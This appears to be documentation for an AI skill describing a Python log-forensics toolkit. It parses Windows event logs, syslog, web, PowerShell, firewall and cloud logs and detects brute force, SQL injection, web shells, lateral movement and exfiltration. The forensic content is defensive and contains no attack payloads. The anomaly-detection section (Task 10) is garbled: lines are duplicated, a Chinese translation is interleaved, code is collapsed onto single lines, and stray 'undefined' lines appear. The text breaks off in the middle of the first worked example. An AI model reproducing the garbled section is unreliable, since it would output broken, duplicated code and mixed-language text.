log-forensics


Log Forensics


Comprehensive log forensics skill for analyzing various log sources to reconstruct events, detect anomalies, and identify indicators of compromise. Enables correlation across multiple log sources, timeline creation, and automated anomaly detection.

Capabilities


  • Windows Event Log Analysis: Parse and analyze EVTX files for security events
  • Syslog Analysis: Parse Unix/Linux syslog and rsyslog formats
  • Web Server Log Analysis: Analyze Apache, Nginx, IIS access and error logs
  • Application Log Analysis: Parse application-specific log formats
  • Log Correlation: Correlate events across multiple log sources
  • Timeline Generation: Create chronological event timelines
  • Anomaly Detection: Detect unusual patterns and outliers
  • Authentication Analysis: Track login attempts, failures, and lateral movement
  • IOC Extraction: Extract indicators of compromise from log entries
  • Statistical Analysis: Perform statistical analysis on log patterns

Quick Start


```python
from log_forensics import LogAnalyzer, EventLogParser, FirewallLogParser, LogCorrelator

# Parse Windows Event Logs
parser = EventLogParser("/evidence/Security.evtx")
events = parser.parse_all()

# Analyze authentication events
auth_events = parser.get_authentication_events()

# Create log correlator
correlator = LogCorrelator()
correlator.add_source("windows", parser)
correlator.add_source("firewall", FirewallLogParser("/evidence/firewall.log"))
timeline = correlator.create_timeline()
```

Usage


Task 1: Windows Event Log Analysis


Input: Windows EVTX log files
Process:
  1. Load and parse EVTX files
  2. Filter by event IDs of interest
  3. Extract relevant fields
  4. Identify security-relevant events
  5. Generate analysis report
Output: Parsed events with security analysis
Example:
```python
from log_forensics import EventLogParser

# Parse Security event log
parser = EventLogParser("/evidence/Security.evtx")

# Get all events
events = parser.parse_all()
print(f"Total events: {len(events)}")

# Filter by event ID (4624 = successful login)
logins = parser.filter_by_event_id([4624, 4625])
for login in logins:
    print(f"[{login.timestamp}] Event {login.event_id}")
    print(f"  User: {login.get_field('TargetUserName')}")
    print(f"  Domain: {login.get_field('TargetDomainName')}")
    print(f"  Logon Type: {login.get_field('LogonType')}")
    print(f"  Source IP: {login.get_field('IpAddress')}")

# Get authentication failures
failures = parser.get_failed_logins()
for f in failures:
    print(f"Failed login: {f.username} from {f.source_ip}")
    print(f"  Failure reason: {f.failure_reason}")

# Detect brute force attempts
brute_force = parser.detect_brute_force(
    threshold=10,
    time_window_minutes=5
)
for bf in brute_force:
    print(f"Brute force: {bf.target_account}")
    print(f"  Attempts: {bf.attempt_count}")
    print(f"  Source IPs: {bf.source_ips}")

# Get process creation events (4688)
processes = parser.get_process_creation_events()
for p in processes:
    print(f"Process: {p.process_name}")
    print(f"  Command line: {p.command_line}")
    print(f"  Parent: {p.parent_process}")

# Export to CSV
parser.export_csv("/evidence/security_events.csv")
```
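The brute-force detection shown above can be reduced to a sliding time window over failed-login (4625) events. Below is a minimal stdlib sketch of that idea; the tuple-based event shape and the `detect_brute_force` signature here are illustrative assumptions, not the library's internals:

```python
from collections import defaultdict
from datetime import datetime, timedelta

def detect_brute_force(events, threshold=10, window=timedelta(minutes=5)):
    """Group failed logins by target account and flag any account whose
    failure count inside a sliding time window reaches the threshold.
    Each event is an illustrative (timestamp, account, source_ip) tuple."""
    by_account = defaultdict(list)
    for ts, account, ip in sorted(events):
        by_account[account].append((ts, ip))
    findings = []
    for account, attempts in by_account.items():
        start = 0
        for end in range(len(attempts)):
            # shrink the window from the left until it spans <= `window`
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                findings.append({
                    "target_account": account,
                    "attempt_count": count,
                    "source_ips": sorted({ip for _, ip in attempts[start:end + 1]}),
                })
                break  # one finding per account is enough for this sketch
    return findings

# Synthetic stream: 12 rapid failures against "admin", one lone failure elsewhere
base = datetime(2024, 1, 1, 3, 0, 0)
events = [(base + timedelta(seconds=10 * i), "admin", "10.0.0.5") for i in range(12)]
events.append((base, "jdoe", "10.0.0.9"))
hits = detect_brute_force(events, threshold=10)
```

A real implementation would also pivot on source IP (password spraying hits many accounts from one IP with few attempts each), but the windowing mechanics are the same.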

Task 2: Security Event Detection


Input: Windows Security Event Log
Process:
  1. Identify security-relevant event IDs
  2. Detect privilege escalation
  3. Identify lateral movement
  4. Detect persistence mechanisms
  5. Flag suspicious activities
Output: Security findings with severity ratings
Example:
```python
from log_forensics import EventLogParser, SecurityDetector

parser = EventLogParser("/evidence/Security.evtx")
detector = SecurityDetector(parser)

# Detect privilege escalation
priv_esc = detector.detect_privilege_escalation()
for pe in priv_esc:
    print(f"PRIV ESC: {pe.technique}")
    print(f"  User: {pe.user}")
    print(f"  Timestamp: {pe.timestamp}")
    print(f"  Details: {pe.details}")

# Detect lateral movement
lateral = detector.detect_lateral_movement()
for lm in lateral:
    print(f"Lateral Movement: {lm.source} -> {lm.destination}")
    print(f"  Technique: {lm.technique}")
    print(f"  Account: {lm.account}")

# Detect account manipulation
account_changes = detector.detect_account_changes()
for ac in account_changes:
    print(f"Account Change: {ac.action}")
    print(f"  Target: {ac.target_account}")
    print(f"  By: {ac.actor}")

# Detect service installations
services = detector.detect_service_installations()
for s in services:
    print(f"Service Installed: {s.service_name}")
    print(f"  Path: {s.service_path}")
    print(f"  Account: {s.service_account}")

# Detect scheduled tasks
tasks = detector.detect_scheduled_tasks()

# Detect log clearing
cleared = detector.detect_log_clearing()
for c in cleared:
    print(f"LOG CLEARED: {c.log_name} at {c.timestamp}")
    print(f"  By: {c.actor}")

# Generate security report
detector.generate_report("/evidence/security_findings.html")
```
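Most of these detections boil down to watching for specific Windows event IDs: 1102 is the audit log being cleared, 4697/7045 mark service installation, 4698 a scheduled task. A hedged sketch of that lookup (the dict-based event shape and ID-to-category mapping are illustrative, not the detector's actual model):

```python
# Illustrative mapping of security-relevant Windows event IDs.
SECURITY_EVENT_IDS = {
    1102: ("log_clearing", "high"),               # audit log cleared
    4697: ("service_installation", "medium"),     # service installed
    4698: ("scheduled_task_created", "medium"),   # scheduled task created
    4720: ("account_created", "medium"),          # user account created
    4732: ("added_to_privileged_group", "high"),  # member added to local group
}

def flag_security_events(events):
    """Return a finding for every event whose ID is security-relevant."""
    findings = []
    for ev in events:
        meta = SECURITY_EVENT_IDS.get(ev["event_id"])
        if meta:
            category, severity = meta
            findings.append({
                "category": category,
                "severity": severity,
                "timestamp": ev["timestamp"],
                "actor": ev.get("actor", "unknown"),
            })
    return findings

sample = [
    {"event_id": 4624, "timestamp": "2024-01-01T03:00:00Z", "actor": "jdoe"},
    {"event_id": 1102, "timestamp": "2024-01-01T03:05:00Z", "actor": "attacker"},
]
findings = flag_security_events(sample)
```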

Task 3: Syslog Analysis


Input: Unix/Linux syslog files
Process:
  1. Parse syslog format
  2. Categorize by facility and severity
  3. Identify authentication events
  4. Detect suspicious activities
  5. Create timeline
Output: Parsed syslog with analysis
Example:
```python
from log_forensics import SyslogParser

# Parse syslog
parser = SyslogParser("/evidence/messages")

# Get all entries
entries = parser.parse_all()
print(f"Total entries: {len(entries)}")

# Filter by severity
errors = parser.filter_by_severity(["error", "crit", "alert", "emerg"])
for e in errors:
    print(f"[{e.timestamp}] {e.facility}.{e.severity}: {e.message}")

# Get authentication events
auth = parser.get_auth_events()
for a in auth:
    print(f"[{a.timestamp}] {a.event_type}: {a.user}")
    print(f"  Source: {a.source_ip}")
    print(f"  Success: {a.success}")

# Detect SSH brute force
ssh_attacks = parser.detect_ssh_brute_force()
for attack in ssh_attacks:
    print(f"SSH Attack from {attack.source_ip}")
    print(f"  Attempts: {attack.count}")
    print(f"  Users tried: {attack.users}")

# Analyze sudo usage
sudo = parser.get_sudo_events()
for s in sudo:
    print(f"Sudo: {s.user} -> {s.run_as}")
    print(f"  Command: {s.command}")
    print(f"  Allowed: {s.allowed}")

# Get cron job executions
cron = parser.get_cron_events()

# Export timeline
parser.export_timeline("/evidence/syslog_timeline.csv")
```
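The classic BSD-syslog line format (RFC 3164, as written by rsyslog to `/var/log/messages` or `auth.log`) can be split with a single regex. A minimal sketch, assuming the traditional `MMM dd HH:MM:SS host program[pid]: message` layout (the `parse_syslog_line` helper is illustrative, not the parser's real API):

```python
import re

# Traditional BSD-syslog line: "Jan  5 03:14:07 host program[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<timestamp>\w{3}\s+\d{1,2}\s[\d:]{8})\s"
    r"(?P<host>\S+)\s"
    r"(?P<program>[^\[:]+)(?:\[(?P<pid>\d+)\])?:\s"
    r"(?P<message>.*)$"
)

def parse_syslog_line(line):
    """Return the line's fields as a dict, or None if it doesn't match."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None

line = "Jan  5 03:14:07 web01 sshd[4321]: Failed password for root from 203.0.113.9 port 52144 ssh2"
entry = parse_syslog_line(line)
```

Note that RFC 3164 timestamps carry no year or timezone, which is why timestamp normalization (Task 5) matters before correlating syslog with other sources.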

Task 4: Web Server Log Analysis


Input: Apache/Nginx/IIS access logs
Process:
  1. Parse access log format
  2. Identify unique visitors
  3. Detect attack patterns
  4. Find suspicious requests
  5. Generate access statistics
Output: Web access analysis with attack detection
Example:
```python
from log_forensics import WebLogParser

# Parse Apache access log
parser = WebLogParser(
    "/evidence/access.log",
    log_format="apache_combined"
)

# Get all requests
requests = parser.parse_all()
print(f"Total requests: {len(requests)}")

# Get unique visitors
visitors = parser.get_unique_visitors()
print(f"Unique IPs: {len(visitors)}")

# Find suspicious requests
suspicious = parser.find_suspicious_requests()
for s in suspicious:
    print(f"SUSPICIOUS: {s.request}")
    print(f"  IP: {s.client_ip}")
    print(f"  Reason: {s.detection_reason}")

# Detect SQL injection attempts
sqli = parser.detect_sql_injection()
for attack in sqli:
    print(f"SQLi: {attack.request}")
    print(f"  Parameter: {attack.parameter}")
    print(f"  IP: {attack.source_ip}")

# Detect path traversal
traversal = parser.detect_path_traversal()

# Detect web shells
webshells = parser.detect_webshell_access()
for ws in webshells:
    print(f"Webshell: {ws.path}")
    print(f"  IP: {ws.client_ip}")
    print(f"  Commands: {ws.detected_commands}")

# Get response code distribution
codes = parser.get_status_code_distribution()
print(f"200 OK: {codes.get(200, 0)}")
print(f"404 Not Found: {codes.get(404, 0)}")
print(f"500 Error: {codes.get(500, 0)}")

# Analyze by user agent
user_agents = parser.analyze_user_agents()
for ua in user_agents.suspicious:
    print(f"Suspicious UA: {ua.user_agent}")
    print(f"  Reason: {ua.reason}")

# Export to CSV
parser.export_csv("/evidence/web_access.csv")
```
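The "apache_combined" format (`%h %l %u %t "%r" %>s %b "Referer" "User-Agent"`) is regular enough to split with one regex, and naive SQLi detection is pattern matching over the URL-decoded request path. A stdlib sketch of both steps (the `SQLI_HINTS` patterns and `parse_and_flag` helper are illustrative assumptions; real detectors use far larger signature sets):

```python
import re
from urllib.parse import unquote_plus

# Apache/Nginx "combined" access-log line:
# %h %l %u [%t] "%r" %>s %b "Referer" "User-Agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A tiny, illustrative set of SQL-injection tells
SQLI_HINTS = re.compile(r"(union\s+select|or\s+1=1|sleep\()", re.IGNORECASE)

def parse_and_flag(line):
    """Parse one combined-format line; mark it suspicious if the
    URL-decoded path matches a known SQLi pattern."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    decoded = unquote_plus(entry["path"])  # decode %27, '+', etc. first
    entry["suspicious"] = bool(SQLI_HINTS.search(decoded))
    return entry

line = ('203.0.113.9 - - [05/Jan/2024:03:14:07 +0000] '
        '"GET /search?q=1%27+OR+1=1-- HTTP/1.1" 200 512 "-" "sqlmap/1.7"')
entry = parse_and_flag(line)
```

Decoding before matching is the important detail: attackers routinely URL-encode payloads precisely to slip past naive raw-line matching.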

Task 5: Log Correlation


Input: Multiple log sources
Process:
  1. Normalize log formats
  2. Align timestamps
  3. Correlate related events
  4. Build unified timeline
  5. Identify attack chains
Output: Correlated timeline with attack sequences
Example:
```python
from log_forensics import LogCorrelator, EventLogParser, SyslogParser, WebLogParser

# Initialize correlator
correlator = LogCorrelator()

# Add log sources
correlator.add_source(
    "windows", EventLogParser("/evidence/Security.evtx")
)
correlator.add_source(
    "linux", SyslogParser("/evidence/auth.log")
)
correlator.add_source(
    "webserver", WebLogParser("/evidence/access.log")
)

# Normalize timestamps to UTC
correlator.normalize_timestamps(timezone="UTC")

# Create unified timeline
timeline = correlator.create_timeline()
for event in timeline:
    print(f"[{event.timestamp}] {event.source}: {event.summary}")

# Correlate by IP address
ip_activity = correlator.correlate_by_ip("192.168.1.100")
print("Activity from 192.168.1.100:")
for event in ip_activity:
    print(f"  [{event.source}] {event.summary}")

# Correlate by username
user_activity = correlator.correlate_by_user("admin")

# Detect attack chains
chains = correlator.detect_attack_chains()
for chain in chains:
    print(f"Attack Chain: {chain.name}")
    print(f"  Confidence: {chain.confidence}")
    print(f"  Events: {len(chain.events)}")
    for event in chain.events:
        print(f"  - {event.timestamp}: {event.summary}")

# Find temporal correlations
correlations = correlator.find_temporal_correlations(
    time_window_seconds=60
)

# Export correlated timeline
correlator.export_timeline("/evidence/correlated_timeline.csv")
correlator.export_timeline_html("/evidence/timeline.html")
```
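Once every source is normalized to `(timestamp, source, summary)` records sorted by time, building the unified timeline is a k-way merge. A minimal sketch using the stdlib's `heapq.merge` (the record shape is an illustrative assumption):

```python
import heapq
from datetime import datetime

def create_timeline(*sources):
    """Interleave several time-sorted event streams into one
    chronological timeline. Each source yields (timestamp, source_name,
    summary) tuples already sorted by timestamp."""
    return list(heapq.merge(*sources, key=lambda e: e[0]))

windows = [
    (datetime(2024, 1, 5, 3, 0), "windows", "4625 failed login for admin"),
    (datetime(2024, 1, 5, 3, 6), "windows", "4624 successful login for admin"),
]
webserver = [
    (datetime(2024, 1, 5, 3, 2), "webserver", "POST /login.php from 203.0.113.9"),
]
timeline = create_timeline(windows, webserver)
```

`heapq.merge` is lazy and never materializes more than one pending event per source, which matters when the inputs are multi-gigabyte logs.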

Task 6: Authentication Analysis


Input: Log files containing authentication events
Process:
  1. Extract all authentication events
  2. Analyze login patterns
  3. Detect anomalous logins
  4. Identify credential attacks
  5. Track session activity
Output: Authentication analysis report
Example:
```python
from log_forensics import AuthenticationAnalyzer

# Initialize with multiple sources
analyzer = AuthenticationAnalyzer()
analyzer.add_windows_logs("/evidence/Security.evtx")
analyzer.add_linux_logs("/evidence/auth.log")
analyzer.add_vpn_logs("/evidence/vpn.log")

# Get all authentication events
auth_events = analyzer.get_all_events()

# Analyze login patterns per user
patterns = analyzer.analyze_user_patterns("john.doe")
print("User: john.doe")
print(f"  Usual login times: {patterns.usual_hours}")
print(f"  Usual locations: {patterns.usual_locations}")
print(f"  Failed attempts: {patterns.failed_count}")

# Detect anomalous logins
anomalies = analyzer.detect_anomalies()
for a in anomalies:
    print(f"ANOMALY: {a.user} at {a.timestamp}")
    print(f"  Reason: {a.reason}")
    print(f"  Details: {a.details}")

# Detect impossible travel
travel = analyzer.detect_impossible_travel()
for t in travel:
    print(f"Impossible Travel: {t.user}")
    print(f"  Location 1: {t.location1} at {t.time1}")
    print(f"  Location 2: {t.location2} at {t.time2}")
    print(f"  Distance: {t.distance_km}km in {t.time_diff_minutes}min")

# Detect credential stuffing
stuffing = analyzer.detect_credential_stuffing()

# Get failed login summary
failed = analyzer.get_failed_login_summary()
print(f"Total failed logins: {failed.total}")
print(f"Top targeted accounts: {failed.top_accounts}")
print(f"Top source IPs: {failed.top_sources}")

# Generate authentication report
analyzer.generate_report("/evidence/auth_analysis.html")
```
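Impossible-travel detection is geometry: geolocate consecutive logins, compute the great-circle distance between them, and flag any pair whose implied speed no aircraft could achieve. A stdlib sketch (the `is_impossible_travel` helper and its 900 km/h cutoff are illustrative assumptions):

```python
from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))  # 6371 km = mean Earth radius

def is_impossible_travel(loc1, t1_minutes, loc2, t2_minutes, max_kmh=900):
    """Flag two logins whose implied speed exceeds a plausible airliner."""
    distance = haversine_km(*loc1, *loc2)
    hours = abs(t2_minutes - t1_minutes) / 60
    return hours == 0 or distance / hours > max_kmh

# New York -> London in 30 minutes is not survivable travel
ny, london = (40.71, -74.01), (51.51, -0.13)
flagged = is_impossible_travel(ny, 0, london, 30)
ok = is_impossible_travel(ny, 0, london, 8 * 60)  # 8 hours: plausible flight
```

In practice the GeoIP lookup (see the `GEOIP_DB` variable under Configuration) is the weak link: VPN exits and mobile carriers produce false positives, so findings are usually corroborated with other signals.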

Task 7: PowerShell and Command Line Analysis


Input: Windows Event Logs with PowerShell/command logging
Process:
  1. Extract PowerShell events (4103, 4104)
  2. Decode encoded commands
  3. Detect malicious patterns
  4. Identify obfuscation techniques
  5. Extract IOCs from commands
Output: Command analysis with threat indicators
Example:
```python
from log_forensics import PowerShellAnalyzer

# Parse PowerShell logs
analyzer = PowerShellAnalyzer()
analyzer.add_event_log("/evidence/Microsoft-Windows-PowerShell%4Operational.evtx")
analyzer.add_event_log("/evidence/Security.evtx")

# Get all PowerShell events
events = analyzer.get_all_events()

# Decode encoded commands
decoded = analyzer.decode_encoded_commands()
for d in decoded:
    print(f"Encoded command at {d.timestamp}:")
    print(f"  Original: {d.encoded[:50]}...")
    print(f"  Decoded: {d.decoded}")

# Detect malicious patterns
malicious = analyzer.detect_malicious_patterns()
for m in malicious:
    print(f"MALICIOUS: {m.pattern}")
    print(f"  Command: {m.command}")
    print(f"  Technique: {m.mitre_technique}")

# Detect download cradles
cradles = analyzer.detect_download_cradles()
for c in cradles:
    print(f"Download Cradle: {c.type}")
    print(f"  URL: {c.url}")
    print(f"  Command: {c.command}")

# Detect obfuscation
obfuscated = analyzer.detect_obfuscation()
for o in obfuscated:
    print(f"Obfuscation: {o.technique}")
    print(f"  Score: {o.obfuscation_score}")

# Extract IOCs from commands
iocs = analyzer.extract_iocs()
print(f"URLs found: {len(iocs.urls)}")
print(f"IPs found: {len(iocs.ips)}")
print(f"Domains found: {len(iocs.domains)}")
print(f"File paths: {len(iocs.file_paths)}")

# Generate report
analyzer.generate_report("/evidence/powershell_analysis.html")
```
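The decoding step itself is simple and worth knowing: PowerShell's `-EncodedCommand` argument is Base64 over the UTF-16LE bytes of the script, not UTF-8, which is why generic Base64 decoders show interleaved null bytes. A self-contained round-trip (the helper name is illustrative):

```python
import base64

def decode_powershell_command(encoded):
    """PowerShell's -EncodedCommand is Base64 over UTF-16LE text."""
    return base64.b64decode(encoded).decode("utf-16-le")

# Round-trip a sample command the way an attacker would encode it
command = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
decoded = decode_powershell_command(encoded)
```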

Task 8: Firewall and Network Log Analysis


Input: Firewall logs (various formats)
Process:
  1. Parse firewall log format
  2. Analyze allowed/denied traffic
  3. Detect port scans
  4. Identify suspicious patterns
  5. Generate traffic statistics
Output: Firewall log analysis
Example:
```python
from log_forensics import FirewallLogParser

# Parse firewall logs
parser = FirewallLogParser(
    "/evidence/firewall.log",
    format="pfsense"  # or "iptables", "windows_firewall", "cisco_asa"
)

# Get all events
events = parser.parse_all()

# Get denied traffic
denied = parser.get_denied_traffic()
for d in denied:
    print(f"DENIED: {d.src_ip}:{d.src_port} -> {d.dst_ip}:{d.dst_port}")
    print(f"  Protocol: {d.protocol}")
    print(f"  Rule: {d.rule_name}")

# Detect port scans
scans = parser.detect_port_scans()
for s in scans:
    print(f"Port Scan: {s.source_ip}")
    print(f"  Target: {s.target_ip}")
    print(f"  Ports: {s.ports_scanned}")
    print(f"  Type: {s.scan_type}")

# Detect potential C2
c2_indicators = parser.detect_c2_indicators()
for c2 in c2_indicators:
    print(f"C2 Indicator: {c2.internal_ip} -> {c2.external_ip}")
    print(f"  Pattern: {c2.pattern}")

# Get traffic summary
summary = parser.get_traffic_summary()
print(f"Total connections: {summary.total}")
print(f"Allowed: {summary.allowed}")
print(f"Denied: {summary.denied}")
print(f"Top talkers: {summary.top_sources}")

# Analyze by destination port
port_analysis = parser.analyze_by_port()
for port, stats in port_analysis.items():
    print(f"Port {port}: {stats.connection_count} connections")

# Export analysis
parser.export_csv("/evidence/firewall_events.csv")
```
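The vertical-scan signature behind `detect_port_scans` is one source IP touching many distinct destination ports on a single target, usually visible as a burst of denies. A minimal stdlib sketch (the tuple event shape and `min_ports` cutoff are illustrative assumptions; real detectors also constrain the time window):

```python
from collections import defaultdict

def detect_port_scans(events, min_ports=20):
    """Flag source IPs that touched many distinct destination ports on
    one target host. Each event is an illustrative
    (src_ip, dst_ip, dst_port) tuple from denied-traffic records."""
    ports = defaultdict(set)  # (src_ip, dst_ip) -> distinct destination ports
    for src_ip, dst_ip, dst_port in events:
        ports[(src_ip, dst_ip)].add(dst_port)
    return [
        {"source_ip": src, "target_ip": dst, "ports_scanned": len(p)}
        for (src, dst), p in ports.items()
        if len(p) >= min_ports
    ]

# 50 sequential ports from one source = scan; 3 common ports elsewhere = normal
events = [("203.0.113.9", "10.0.0.5", port) for port in range(1, 51)]
events += [("10.0.0.7", "10.0.0.5", p) for p in (80, 443, 22)]
scans = detect_port_scans(events)
```

The mirror case, a horizontal scan, counts distinct target hosts per (source, port) pair instead; the bookkeeping is identical with the key swapped.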

Task 9: Cloud Service Log Analysis


Input: Cloud platform logs (AWS, Azure, GCP)
Process:
  1. Parse cloud log format
  2. Identify management events
  3. Detect suspicious API calls
  4. Analyze IAM activities
  5. Check for data access
Output: Cloud activity analysis
Example:
```python
from log_forensics import CloudLogAnalyzer

# AWS CloudTrail analysis
aws_analyzer = CloudLogAnalyzer(
    "/evidence/cloudtrail/",
    platform="aws"
)

# Get all events
events = aws_analyzer.parse_all()

# Get IAM events
iam_events = aws_analyzer.get_iam_events()
for e in iam_events:
    print(f"[{e.timestamp}] {e.event_name}")
    print(f"  User: {e.user_identity}")
    print(f"  Source IP: {e.source_ip}")

# Detect suspicious activities
suspicious = aws_analyzer.detect_suspicious_activities()
for s in suspicious:
    print(f"SUSPICIOUS: {s.event_name}")
    print(f"  Reason: {s.reason}")
    print(f"  Risk: {s.risk_level}")

# Detect privilege escalation
priv_esc = aws_analyzer.detect_privilege_escalation()

# Detect data exfiltration indicators
exfil = aws_analyzer.detect_data_exfiltration()
for e in exfil:
    print(f"Potential Exfil: {e.resource}")
    print(f"  Action: {e.action}")
    print(f"  By: {e.user}")

# Analyze S3 access
s3_access = aws_analyzer.get_s3_access_events()
for access in s3_access:
    print(f"S3: {access.action} on {access.bucket}")
    print(f"  Object: {access.object_key}")
    print(f"  User: {access.user}")

# Generate cloud security report
aws_analyzer.generate_report("/evidence/cloud_analysis.html")
```
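Under the hood, a CloudTrail log file is JSON with a top-level `Records` array, and IAM activity is identified by `eventSource == "iam.amazonaws.com"`. A self-contained sketch over an inline sample (the `iam_events` helper is illustrative; the field names follow the CloudTrail record format):

```python
import json

# Inline stand-in for one CloudTrail log file
SAMPLE = json.dumps({"Records": [
    {"eventTime": "2024-01-05T03:14:07Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"userName": "svc-backup"}},
    {"eventTime": "2024-01-05T03:15:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "sourceIPAddress": "10.0.0.7",
     "userIdentity": {"userName": "jdoe"}},
]})

def iam_events(cloudtrail_json):
    """Return only the records produced by the IAM service."""
    records = json.loads(cloudtrail_json)["Records"]
    return [r for r in records if r["eventSource"] == "iam.amazonaws.com"]

events = iam_events(SAMPLE)
```

Events like `CreateAccessKey` on a service account from an unfamiliar IP are exactly the kind of record the suspicious-activity detection above would escalate.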

Task 10: Log Anomaly Detection


Input: Any log source
Process:
  1. Establish baseline patterns
  2. Apply statistical analysis
  3. Detect outliers
  4. Identify unusual sequences
  5. Flag anomalies
Output: Anomaly detection results
Example:
python
from log_forensics import AnomalyDetector
输入:任何日志源
流程:
  1. 建立基准模式
  2. 应用统计分析
  3. 检测离群值
  4. 识别异常序列
  5. 标记异常
输出:异常检测结果
示例:
python
from log_forensics import AnomalyDetector

Initialize detector

Initialize detector

detector = AnomalyDetector()
detector = AnomalyDetector()

Add log sources

Add log sources

detector.add_logs("/evidence/Security.evtx") detector.add_logs("/evidence/access.log") detector.add_logs("/evidence/auth.log")
detector.add_logs("/evidence/Security.evtx") detector.add_logs("/evidence/access.log") detector.add_logs("/evidence/auth.log")

Build baseline (using first portion of logs)

Build baseline (using first portion of logs)

detector.build_baseline(training_percentage=0.7)
detector.build_baseline(training_percentage=0.7)

Detect volume anomalies

Detect volume anomalies

volume_anomalies = detector.detect_volume_anomalies() for a in volume_anomalies: print(f"Volume Anomaly at {a.timestamp}") print(f" Expected: {a.expected_count}") print(f" Actual: {a.actual_count}") print(f" Deviation: {a.deviation}x")
volume_anomalies = detector.detect_volume_anomalies() for a in volume_anomalies: print(f"Volume Anomaly at {a.timestamp}") print(f" Expected: {a.expected_count}") print(f" Actual: {a.actual_count}") print(f" Deviation: {a.deviation}x")

Detect timing anomalies

Detect timing anomalies

timing_anomalies = detector.detect_timing_anomalies() for a in timing_anomalies: print(f"Timing Anomaly: {a.description}") print(f" Event: {a.event_type}") print(f" Usual time: {a.usual_time}") print(f" Occurred: {a.actual_time}")
timing_anomalies = detector.detect_timing_anomalies() for a in timing_anomalies: print(f"Timing Anomaly: {a.description}") print(f" Event: {a.event_type}") print(f" Usual time: {a.usual_time}") print(f" Occurred: {a.actual_time}")

Detect sequence anomalies

Detect sequence anomalies

sequence_anomalies = detector.detect_sequence_anomalies() for a in sequence_anomalies: print(f"Unusual Sequence: {a.sequence}") print(f" Probability: {a.probability}")
sequence_anomalies = detector.detect_sequence_anomalies() for a in sequence_anomalies: print(f"Unusual Sequence: {a.sequence}") print(f" Probability: {a.probability}")

Detect rare events

Detect rare events

rare_events = detector.find_rare_events(threshold=0.01) for e in rare_events: print(f"Rare Event: {e.event_type}") print(f" Frequency: {e.frequency}") print(f" Count: {e.count}")
rare_events = detector.find_rare_events(threshold=0.01) for e in rare_events: print(f"Rare Event: {e.event_type}") print(f" Frequency: {e.frequency}") print(f" Count: {e.count}")

Generate anomaly report

Generate anomaly report

detector.generate_report("/evidence/anomaly_report.html")
undefined
detector.generate_report("/evidence/anomaly_report.html")
undefined
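The statistical core of volume anomaly detection can be illustrated without the toolkit. Below is a minimal, self-contained sketch (plain Python; the function name and the z-score approach are illustrative assumptions, not the skill's actual implementation) that buckets events per hour and flags counts deviating from the baseline mean by more than `threshold` standard deviations:

```python
from collections import Counter
from statistics import mean, stdev

def volume_anomalies(timestamps, threshold=3.0):
    """Flag hours whose event count deviates from the mean by > threshold sigmas.

    timestamps: ISO-8601 strings, e.g. "2024-03-15T02:14:09".
    """
    counts = Counter(ts[:13] for ts in timestamps)  # bucket by "YYYY-MM-DDTHH"
    if len(counts) < 2:
        return {}
    mu, sigma = mean(counts.values()), stdev(counts.values())
    if sigma == 0:
        return {}
    return {hour: n for hour, n in counts.items()
            if abs(n - mu) / sigma > threshold}

# Twenty quiet hours of 10 events each, then one hour with a 1000-event burst:
quiet = [f"2024-03-15T{h:02d}:00:00" for h in range(20) for _ in range(10)]
burst = ["2024-03-15T21:30:00"] * 1000
print(volume_anomalies(quiet + burst))  # only the burst hour is flagged
```

A production detector would use a rolling baseline rather than the whole dataset, which is what the `build_baseline(training_percentage=...)` step above approximates.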

Configuration

Environment Variables

| Variable | Description | Required | Default |
|----------|-------------|----------|---------|
| `LOG_TIMEZONE` | Default timezone for log parsing | No | UTC |
| `EVTX_PARSER` | Path to EVTX parser binary | No | Built-in |
| `GEOIP_DB` | Path to GeoIP database | No | None |
| `YARA_RULES` | Path to YARA rules for log analysis | No | None |
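For illustration, this is how a Python tool might resolve these variables with the documented defaults. The variable names come from the table above; the lookup pattern itself is an assumption about the implementation:

```python
import os

# Fall back to the documented defaults when a variable is unset.
log_timezone = os.environ.get("LOG_TIMEZONE", "UTC")
evtx_parser = os.environ.get("EVTX_PARSER")   # None -> use the built-in parser
geoip_db = os.environ.get("GEOIP_DB")         # optional GeoIP enrichment database
yara_rules = os.environ.get("YARA_RULES")     # optional YARA rule file

print(f"Parsing logs in timezone: {log_timezone}")
```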

Options

| Option | Type | Description |
|--------|------|-------------|
| `normalize_timestamps` | boolean | Normalize all timestamps to UTC |
| `parallel_parsing` | boolean | Enable parallel log parsing |
| `cache_parsed` | boolean | Cache parsed log entries |
| `max_memory_mb` | integer | Maximum memory (MB) for log processing |
| `chunk_size` | integer | Lines to process per chunk |
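The `chunk_size` and `max_memory_mb` options exist because a multi-gigabyte log cannot be loaded whole. A self-contained sketch of the underlying chunked-reading pattern (plain Python, independent of the toolkit's internals, which are not documented here):

```python
from itertools import islice

def iter_chunks(path, chunk_size=10_000):
    """Yield lists of at most chunk_size lines so memory use stays bounded."""
    with open(path, errors="replace") as fh:
        while True:
            chunk = list(islice(fh, chunk_size))
            if not chunk:
                return
            yield chunk

# Each chunk can be parsed and discarded before the next is read:
# for chunk in iter_chunks("/evidence/access.log"):
#     process(chunk)
```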

Examples

Example 1: Investigating Unauthorized Access

Scenario: Detecting and analyzing unauthorized system access

```python
from log_forensics import EventLogParser, AuthenticationAnalyzer

# Parse Security event log
parser = EventLogParser("/evidence/Security.evtx")

# Get failed login attempts
failed = parser.get_failed_logins()
print(f"Total failed logins: {len(failed)}")

# Group by target account
accounts = {}
for f in failed:
    if f.target_account not in accounts:
        accounts[f.target_account] = []
